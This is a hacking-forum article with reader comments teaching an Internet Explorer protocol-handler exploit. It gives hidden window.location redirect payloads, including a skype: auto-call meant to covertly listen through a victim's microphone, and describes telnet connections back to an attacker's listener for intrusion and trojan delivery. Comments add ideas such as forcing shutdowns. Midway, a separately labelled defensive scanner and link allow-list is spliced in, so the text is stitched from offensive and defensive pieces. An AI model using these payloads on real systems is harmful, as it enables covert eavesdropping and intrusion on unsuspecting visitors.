HellBoundHackers
IE Xploit

What the IE exploit is, how to use it, how to hide it and what you can do, with examples. Script kiddies beware: this article is engineered to give only enough to be just that, script kiddies; the hardcore stuff you've got to learn yourself.



-=IE Exploit=-

Ok, this exploit isn't exactly the newest in the book, but at the time of writing it's still valid and hasn't been patched (thanks, Microsoft). In short: when IE is handed a URL whose scheme belongs to a program registered on the visitor's machine, it starts that program with the URL as its argument, and it does so without asking. That lets a web page remotely run programs on the visitor's computer. So let's dig in.

We'll start with a bit of stuff you should know:

Open up IE and in the URL bar type "C:\"
Wow, IE just turned into Windows Explorer (sort of): it shows you a directory listing of your own drive.
Isn't that interesting? Well, what if we could run other programs that way... what could we do?
Think about any site you've been to that lets you open an AIM window to someone. Ever looked at the hyperlink target? It looks something like this:

aim:goIm?screenname=tikprog&message=hello+world

Okay, let's break that up a bit. We've got 3 parts to this:

aim:
goIm?
screenname=tikprog&message=hello+world

The aim: part is the scheme. It tells the browser which program to hand the rest of the URL to. Various programs register one of these:

aim:
yahoo:
irc:
etc.

Next we have goIm? ... look like PHP to anyone but me? Yeah, similar. It's the command. AIM has a lot of these:

goIm?
goAway?

and lots of others (google "aim:goIm?" and it should give you a nice list).

And finally, those of you who know PHP will know this already: the last bit is the parameters, in the same name=value&name=value form as a query string, with + standing for a space. That one will send me an IM with "hello world" in it. I'm not going to explain AIM scripting (if you can even call it that; google is your friend, or if you beg maybe I'll write a "scripting for various things" article).

Okay, to the important part here: the "aim:" part. Now, if AIM has this, and as I've said so do Yahoo and IRC, what else may have it? Well, I know for a fact a lot of things do. I'll give some examples later, but first I want you to learn a bit, because that is what being a hacker is about. The place to look is the registry: on Windows a program claims a scheme by creating HKEY_CLASSES_ROOT\<scheme> with a "URL Protocol" value and a shell\open\command key holding the command line to run, with the whole URL substituted for the %1 placeholder. Every key of that shape on the target's machine is something a web page can start.

The reason this is good for IE and not other browsers (yay for Firefox!) is that IE doesn't prompt you for confirmation that you want to run the program; Firefox prompts you with a nice little box. Now, this becomes a dangerous exploit when you realize that some other programs that are more dangerous than AIM or IRC have this property. Let's say... oh... command, telnet, regedit. Of those, telnet: is registered on Windows out of the box; whether anything else is reachable this way depends entirely on what is registered on the target's machine, so check the registry before assuming. For command and regedit I'm only going to show how to access them; using them is much more difficult, and I'm not giving that up so a bunch of script kiddies can flood the net with destructive web pages. Those of you who actually figure it out, I'm hoping, are not going to kill the world. These pages can do a LOT of damage, and I in no way advocate them for destructive use, but there is a way (that I will show) to use them to gain some nice access and play some fun tricks.

With that being said... let's move on to the next topic. So now you have half a clue what's up with this exploit. If you've been paying attention you may be thinking to yourself "<insert preferred name here>, don't they have to click a hyperlink? Who's dumb enough to do that?"

Thankfully, the Samurai has put 2 and 2 together (and gotten 5... read 1984, seriously) and made a nice little script to do that too. So, I'm not explaining how JScript works, just going to show you the code and give a brief explanation. If you don't know JScript... GO LEARN, DAMNIT. So here's my code:

<script>
// navigating to a registered scheme hands the whole URL to the handler program
window.location="aim:goIm?screenname=tikprog&message=hello+world";
</script>

So, what does this do? It "redirects" the page to that URL, which isn't really a web address, just a nice little command. Embed this in a web page and no one will notice: the page itself doesn't change, the browser simply passes the URL to the handler, which runs. No click is needed; loading the page is enough.
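The URL anatomy above (scheme, command, parameters) and the hidden window.location redirect are the two things a defender needs to recognise. What follows is an added example, not code from the original article: a small Node.js module that parses protocol-handler URLs into those parts, also handles the telnet://host:port form used later in the article, classifies a link by what the browser will do with it, and scans page source for hidden handler launches. The allow-list check is the fix for a site that lets visitors post links. The sample page and the names and addresses in it (tikprog, username, www.example.org, 203.0.113.5) are constructed for the example.

```javascript
// Added example (not from the original article). Parses protocol-handler
// URLs such as aim:goIm?screenname=..., skype:user?call and telnet://host:port,
// classifies what a browser would do with a link, and scans page source for
// hidden handler launches. Runs under Node.js with no dependencies.

// RFC 3986 scheme: one letter, then letters/digits/"+"/"-"/".", then ":".
const SCHEME_RE = /^([a-z][a-z0-9+.-]*):/i;

// Browsers trim surrounding whitespace and drop embedded tabs and newlines
// before parsing a URL, so "java\tscript:" is still javascript:. Do the same
// before classifying, or an attacker bypasses the check with a tab.
function normalizeHref(href) {
  return String(href).trim().replace(/[\t\n\r]/g, '');
}

// application/x-www-form-urlencoded: "+" is a space, %XX is a byte.
// A malformed escape is returned unchanged instead of throwing.
function formDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch (e) { return s; }
}

// Split a URL into the parts the article walks through: scheme, then either an
// authority (telnet://host:port, IPv6 hosts in brackets) or an opaque path
// (aim:goIm), then the name=value parameters after "?".
function parseHandlerUri(href) {
  const s = normalizeHref(href);
  const m = SCHEME_RE.exec(s);
  if (!m) return { scheme: null, authority: null, host: null, port: null, path: s, params: {} };
  const scheme = m[1].toLowerCase();
  let rest = s.slice(m[0].length);
  let authority = null, host = null, port = null;
  if (rest.startsWith('//')) {
    const end = rest.slice(2).search(/[/?#]/);
    authority = end === -1 ? rest.slice(2) : rest.slice(2, 2 + end);
    rest = end === -1 ? '' : rest.slice(2 + end);
    const hp = /^(?:[^@]*@)?(\[[^\]]*\]|[^:]*)(?::(\d+))?$/.exec(authority);
    if (hp) { host = hp[1]; port = hp[2] === undefined ? null : Number(hp[2]); }
  }
  const q = rest.indexOf('?');
  const path = q === -1 ? rest : rest.slice(0, q);
  const params = {};
  if (q !== -1) {
    for (const pair of rest.slice(q + 1).split('&')) {
      if (pair === '') continue;
      const eq = pair.indexOf('=');
      const key = eq === -1 ? pair : pair.slice(0, eq);
      const value = eq === -1 ? '' : pair.slice(eq + 1);
      params[formDecode(key)] = formDecode(value);
    }
  }
  return { scheme, authority, host, port, path, params };
}

// Schemes the browser handles itself. Anything else with a scheme is passed to
// whatever program is registered for it on the visitor's machine, which is the
// behaviour the article relies on. A bare drive letter ("C:\") lands here too,
// which is the right answer for a link filter.
const WEB_SCHEMES = new Set(['http', 'https']);
const SCRIPT_SCHEMES = new Set(['javascript', 'vbscript', 'data']);

function classifyHref(href) {
  const { scheme } = parseHandlerUri(href);
  if (scheme === null) return 'relative';
  if (WEB_SCHEMES.has(scheme)) return 'web';
  if (SCRIPT_SCHEMES.has(scheme)) return 'script';
  return 'external-handler';
}

// Allow-list for user-supplied links (profile pages, forum posts, IM-to-web
// gateways): only relative and http(s) URLs get emitted. A deny-list of
// "aim:", "skype:", "telnet:" would miss the next handler a program registers.
function isSafeHref(href) {
  const kind = classifyHref(href);
  return kind === 'relative' || kind === 'web';
}

// Scan page source for handler launches: URL-bearing attributes and
// assignments to window.location / location.href in inline script.
function findHandlerLaunches(html) {
  const hits = [];
  const patterns = [
    /\b(?:href|src|action)\s*=\s*["']([^"']*)["']/gi,
    /\b(?:window\.)?location(?:\.href)?\s*=\s*["']([^"']*)["']/gi,
  ];
  for (const re of patterns) {
    let m;
    while ((m = re.exec(html)) !== null) {
      if (classifyHref(m[1]) === 'external-handler') hits.push({ raw: m[1], ...parseHandlerUri(m[1]) });
    }
  }
  return hits;
}

// Constructed sample page, modelled on the article's hidden redirect.
const SAMPLE_PAGE = `<html><body>
<a href="https://www.example.org/">harmless link</a>
<a href="aim:goIm?screenname=tikprog&message=hello+world">say hi</a>
<script>
window.location="skype:username?call";
</script>
<a href=" JAVA\tSCRIPT:alert(1)">not a handler, but not safe either</a>
</body></html>`;

for (const hit of findHandlerLaunches(SAMPLE_PAGE)) {
  console.log(`${hit.scheme}: path=${hit.path} params=${JSON.stringify(hit.params)}`);
}
```

The scanner is a source-level check, so it only catches literal URLs; a page that assembles the scheme at runtime needs to be observed in a browser or proxy instead. The allow-list, by contrast, is applied to each link before it is emitted and does not care how the attacker spelled the scheme, because it normalises whitespace the way the browser does.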

So... now you're thinking "...but Samurai, who cares about putting an AIM message script in?" And again, ye of little faith, I have some fun with this. I'll give you a few nice ones.

For snooping:
There is a nice little messaging program out there, Skype (www.skype.com; I would recommend it. It's encrypted, allows VoIP, has rocking emoticons (type "(finger)" for a hidden one), and just kicks AIM's butt). Most important is VoIP. So, let's say you get your friend (or whoever you want to snoop on). Go nab the source from a trusted site; I like Google. Build a web page on it (make sure you change the picture sources so they show up), place it somewhere like GeoCities with the code embedded, and use AIM to hide the link by putting fake text (HTML works nicely too) over the URL.

Skype's scheme works like this:
skype:
but the order is reversed compared to AIM: the user name comes first and the command goes after the question mark... username?call.
So embed this code:

<script>
// "skype:<user>?call" makes the visitor's Skype place a call to <user>
window.location="skype:username?call";
</script>

And then answer the call. If they have a mic, it will turn on and you can listen in.

Now, as promised, the reason for this... intrusion!

Build a similar page, and this time we're using our friend telnet. You're going to need my simple trojan article, or build a socket receiver in VB or whatever you want. Note which side needs to be reachable: the target's machine makes an outgoing connection, so it can sit behind a router just fine, but the listener you run must be reachable from the Internet. You need a REAL, public IP address (or a port forwarded to you on your router); if you only have a private address behind NAT, the connection never arrives.

So, we all know our friend telnet. Your code needs to open telnet to your IP address on the port you want. Telnet's URL takes a slightly different form from the aim: and skype: ones (think like a command line): the scheme is followed by //host:port, the same host and port you'd type after the telnet command, and that goes in the JScript code. I'm not giving you the whole thing... I want YOU to learn, and to make sure not everyone does this.

So just think... using command, regedit, *nix, you could open ports, run other apps, download trojans. And with a bit of creativity, possibly gain some new access.

Enjoy.

Comments

hackerboy666 on October 03 2006 - 17:08:30
That's one of the best articles I've read in quite some time. Interesting and helpful. Good job!
only_samurai on October 03 2006 - 17:11:22
Thanks mate. Rate it high if you like it. PM me if y'all have any questions or anything. I'm glad to help.
BluMoose on October 03 2006 - 19:01:36
Very nice article. Making a .swf to execute the code could lead to a lot of entertainment as well (imagine people's PCs shutting down every time they opened your MySpace page...)
chislam on October 03 2006 - 22:28:40
Nice article, man.
Arto_8000 on October 04 2006 - 02:26:07
Actually, I dunno why you call this type of exploit IE only. Some protocols such as "irc" don't ask you before they execute, but for xml: it asks you first. It only depends on what protocol you're using.
only_samurai on October 04 2006 - 04:01:47
The IE-only part means that FF and such don't have it. They still allow these things, but they prompt a question first, so you can't use it hidden.
SwiftNomad on October 06 2006 - 20:03:45
I liked this one. I'm going to dig more into this. Good job!
korg on October 07 2006 - 02:36:32
Great article for new people, but this has been well known for a while, and Skype, well, for us elders, LOL. Still good though. 6/10
only_samurai on October 24 2006 - 17:28:23
kiyoura, what more do you want? Want me to spell out how to take out files, edit the registry, send emails via this so all you skiddies can just jump on and "hack the planet"? This is saying what can be done and giving some examples. I'm not going to write code out that will just tell you what to do. GO LEARN SOMETHING.
TWS_Sentinel on January 11 2007 - 06:48:17
A very nice article, but one question... say you're able to execute the "telnet://" and open a connection to your TcpListener or some kind of socket listener. Use a StreamWriter to upload data/trojan/whatever... you still can then execute the package remotely. Or can you? Maybe I'm missing something?
TWS_Sentinel on January 11 2007 - 06:49:15
Sorry, the above should be corrected: you still can't then execute.
only_samurai on February 19 2007 - 21:54:02
I don't think you can remotely execute it, unless you can use the IE exploit to do that. So have your connection software be automated and have the page that does the telnet redirect automatically after like 10 seconds to the page that calls "program://" or whatever... that might work.
revolt0163 on March 08 2007 - 01:27:23
Say you put aim://bladhvadhfKS in a frames tag, and they didn't have AIM, would it give an error message?
Der Heiligen on March 11 2007 - 16:42:28
Very good article samurai, I'm definitely digging deeper into this too. And I'm glad you didn't just spoon-feed skiddies how to do it. Very good job.
R3l3ntl3ss on April 22 2007 - 21:53:49
Great, thank you! Really good! And great it stops skiddies!
Damnation on June 18 2007 - 06:39:39
Wow, thanks samurai! I have so many new, fun ideas! I'm guessing script kiddies rated this poor.